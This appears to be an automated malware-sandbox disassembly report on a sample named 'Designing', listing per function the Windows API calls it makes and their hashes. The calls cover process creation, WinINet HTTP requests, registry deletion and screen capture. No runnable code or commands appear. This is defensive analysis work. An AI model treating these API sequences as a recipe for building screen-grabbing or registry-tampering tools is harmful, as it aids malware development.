                                                                                                                                                                                • Part of subcall function 00E10F4E: GetStdHandle.KERNEL32(000000F6), ref: 00E10F6D
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2BDAB
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E2BDC6
                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E2BE16
                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00E2BE67
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00E2BE99
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E2BEAA
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E2BEBC
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E2BECE
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00E2BF43
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2178637699-0
                                                                                                                                                                              • Opcode ID: df3f73d2a26876765a62a97e832c399bee655e460da79daf3d6c423b9c377c90
                                                                                                                                                                              • Instruction ID: d80f91edb7286e5e2aca337c148f3bc7a76230dd33ddcefbdab1893c0056f99c
                                                                                                                                                                              • Opcode Fuzzy Hash: df3f73d2a26876765a62a97e832c399bee655e460da79daf3d6c423b9c377c90
                                                                                                                                                                              • Instruction Fuzzy Hash: B6F1DF31604311DFC714EF24D891B6ABBE1EF85314F18995DF895AB2A2CB71EC44CB62
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00E3DCD0), ref: 00E24B18
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E24B2A
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00E3DCD0), ref: 00E24B4F
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00E3DCD0), ref: 00E24B9B
                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028,?,00E3DCD0), ref: 00E24C05
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000009), ref: 00E24CBF
                                                                                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E24D25
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00E24D4F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                              • API String ID: 354098117-199464113
                                                                                                                                                                              • Opcode ID: fa6b2cbda59661d4314dc16158224ef7d768f7c95c2b3597733620c64572f166
                                                                                                                                                                              • Instruction ID: e007f216ca9855fb6be7b5bd26de1a3081e635d2a37b6b02c036ada7cab1957b
                                                                                                                                                                              • Opcode Fuzzy Hash: fa6b2cbda59661d4314dc16158224ef7d768f7c95c2b3597733620c64572f166
                                                                                                                                                                              • Instruction Fuzzy Hash: 93124DB1A00119EFDB14CF54D884EAABBB5FF85318F159098E905AB291D731EE46CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenuItemCount.USER32(00E729C0), ref: 00DE3F72
                                                                                                                                                                              • GetMenuItemCount.USER32(00E729C0), ref: 00DE4022
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00DE4066
                                                                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00DE406F
                                                                                                                                                                              • TrackPopupMenuEx.USER32(00E729C0,00000000,?,00000000,00000000,00000000), ref: 00DE4082
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00DE408E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 36266755-4108050209
                                                                                                                                                                              • Opcode ID: 8c36ac2503f8e166c4c6cbfad22dbb3f389d6db89084a39adfaac88f7a8ba979
                                                                                                                                                                              • Instruction ID: eb7dac273ad9bf7c8c658ad08e5328b74aee14026835b2aa04422e9886e759ed
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c36ac2503f8e166c4c6cbfad22dbb3f389d6db89084a39adfaac88f7a8ba979
                                                                                                                                                                              • Instruction Fuzzy Hash: 98712630A04245BFEB219F2ADC4DFAABFA5FF05724F140215F514661E1C7719910D760
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(00000000,?), ref: 00E37823
                                                                                                                                                                                • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E37897
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E378B9
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E378CC
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00E378ED
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DA0000,00000000), ref: 00E3791C
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E37935
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00E3794E
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00E37955
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E3796D
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E37985
                                                                                                                                                                                • Part of subcall function 00DA2234: GetWindowLongW.USER32(?,000000EB), ref: 00DA2242
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                              • String ID: 0$tooltips_class32
                                                                                                                                                                              • API String ID: 2429346358-3619404913
                                                                                                                                                                              • Opcode ID: e96994a40cd726b0cfff8fab846c2f1213e16fd87d0aed7347e0db4ed337fe9e
                                                                                                                                                                              • Instruction ID: 1d6e8001ee2b07b5e39ae60f6242a06c520338c0f86dfef4cb90d9b8e80ae9a8
                                                                                                                                                                              • Opcode Fuzzy Hash: e96994a40cd726b0cfff8fab846c2f1213e16fd87d0aed7347e0db4ed337fe9e
                                                                                                                                                                              • Instruction Fuzzy Hash: 117198B0508244AFD725CF19DC48F7ABBF9EBC9308F04551EF985A7261C770A94ADB21
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DA1488,?,00000000,?,?,?,?,00DA145A,00000000,?), ref: 00DA1865
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00DA1521
                                                                                                                                                                              • KillTimer.USER32(00000000,?,?,?,?,00DA145A,00000000,?), ref: 00DA15BB
                                                                                                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00DE29B4
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00DA145A,00000000,?), ref: 00DE29E2
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00DA145A,00000000,?), ref: 00DE29F9
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DA145A,00000000), ref: 00DE2A15
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00DE2A27
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                              • String ID: <)
                                                                                                                                                                              • API String ID: 641708696-200976629
                                                                                                                                                                              • Opcode ID: e68b53503a04399cc99d9709d45c3a89a78b0a27b592c981ca0146d3a56b97eb
                                                                                                                                                                              • Instruction ID: 279ddf4e8820477f9b49c31bcc81c86818a84fd3f3df32e0e0b8cabaa81f4479
                                                                                                                                                                              • Opcode Fuzzy Hash: e68b53503a04399cc99d9709d45c3a89a78b0a27b592c981ca0146d3a56b97eb
                                                                                                                                                                              • Instruction Fuzzy Hash: 7C618A34905745DFCB39DF1AD948B3A7BB5FB81322F18441CE1866A660C770E895CFA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E1CEF5
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E1CF08
                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E1CF1C
                                                                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E1CF35
                                                                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00E1CF78
                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E1CF8E
                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E1CF99
                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E1CFC9
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E1D021
                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E1D035
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00E1D040
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3800310941-3916222277
                                                                                                                                                                              • Opcode ID: 05314d38c6b7c72a32e96e2164224d617313c419095cee4e71f9e6203503810c
                                                                                                                                                                              • Instruction ID: 5d097a08b6f210996596bad15de2e790583821341e907ccd531f1028a9ace733
                                                                                                                                                                              • Opcode Fuzzy Hash: 05314d38c6b7c72a32e96e2164224d617313c419095cee4e71f9e6203503810c
                                                                                                                                                                              • Instruction Fuzzy Hash: 915148B1604608BFDB219F61DC88AEB7BFDFB08748F10541AF945E6250D734D989AB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E366D6,?,?), ref: 00E38FEE
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E38FFE
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E39009
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E39016
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00E39024
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E39033
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E3903C
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E39043
                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E39054
                                                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E40C04,?), ref: 00E3906D
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00E3907D
                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00E3909D
                                                                                                                                                                              • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00E390CD
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00E390F5
                                                                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E3910B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3840717409-0
                                                                                                                                                                              • Opcode ID: 7faf6e3d75dc9f53815579e542dad870bcad3a3c53a043424cb619e6efe2697f
                                                                                                                                                                              • Instruction ID: 42b1054531e7a2c7da1677940125a16e0909cd1efe1601427285e0bde99563a1
                                                                                                                                                                              • Opcode Fuzzy Hash: 7faf6e3d75dc9f53815579e542dad870bcad3a3c53a043424cb619e6efe2697f
                                                                                                                                                                              • Instruction Fuzzy Hash: 28411675600208AFDB119F66EC8CEABBFB8EB89715F108058F915EB261D7709945DB20
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E2D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E2C10E,?,?), ref: 00E2D415
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D451
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4C8
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4FE
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2C154
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E2C1D2
                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,?), ref: 00E2C26A
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00E2C2DE
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00E2C2FC
                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00E2C352
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E2C364
                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E2C382
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00E2C3E3
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00E2C3F4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                              • API String ID: 146587525-4033151799
                                                                                                                                                                              • Opcode ID: 32a1510951d18a6286a6e7b9a60610720404f445b2aca1b47dffa6bc8ebe4495
                                                                                                                                                                              • Instruction ID: 72e732cf71ff52b1c7e10425d7d5712618b572355ef27e4cb5b2af2b865ae702
                                                                                                                                                                              • Opcode Fuzzy Hash: 32a1510951d18a6286a6e7b9a60610720404f445b2aca1b47dffa6bc8ebe4495
                                                                                                                                                                              • Instruction Fuzzy Hash: 15C18035208211AFD714DF14D895F2ABBE1FF45318F24989CF456AB2A2CB71EC46CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00E3A990
                                                                                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 00E3A9A7
                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00E3A9B3
                                                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00E3A9C9
                                                                                                                                                                              • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00E3AC15
                                                                                                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E3AC33
                                                                                                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E3AC54
                                                                                                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00E3AC73
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00E3AC95
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000005,?), ref: 00E3ACBB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                              • String ID: @$(
                                                                                                                                                                              • API String ID: 3962739598-2721164788
                                                                                                                                                                              • Opcode ID: 69df01873972318f4ae0ab3252215b85b5734d353cd3666fed4a1d7458bd6b67
                                                                                                                                                                              • Instruction ID: 3c80358f91fa995a785831b7b89ad4c89eee81d758e4fbd0b02637cd5c8e7b1f
                                                                                                                                                                              • Opcode Fuzzy Hash: 69df01873972318f4ae0ab3252215b85b5734d353cd3666fed4a1d7458bd6b67
                                                                                                                                                                              • Instruction Fuzzy Hash: 36B18C31500219DFDF14CF69C9887BEBBF2BF44704F18A079ED84AA295D771A980CB51
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E397B6
                                                                                                                                                                              • GetFocus.USER32 ref: 00E397C6
                                                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00E397D1
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00E39879
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E3992B
                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 00E39948
                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00E39958
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E3998A
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E399CC
                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E399FD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                              • String ID: 0$(
                                                                                                                                                                              • API String ID: 1026556194-1385328161
                                                                                                                                                                              • Opcode ID: 31b6464b9ae9a0bd5031f5428c2d65e4ba7ce5eefabca960cc379e0446be3547
                                                                                                                                                                              • Instruction ID: 4a9ca2d8813404a21a7c454f8ec5f0748cb9aa25af2b4a2bf8cd1818eddcdf31
                                                                                                                                                                              • Opcode Fuzzy Hash: 31b6464b9ae9a0bd5031f5428c2d65e4ba7ce5eefabca960cc379e0446be3547
                                                                                                                                                                              • Instruction Fuzzy Hash: 4C81BD715083019FD714CF25D889AABBFE8FBC9318F04191DF995A7292C7B1D905CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00E23035
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00E23045
                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00E23051
                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00E2305E
                                                                                                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00E230CA
                                                                                                                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00E23109
                                                                                                                                                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00E2312D
                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00E23135
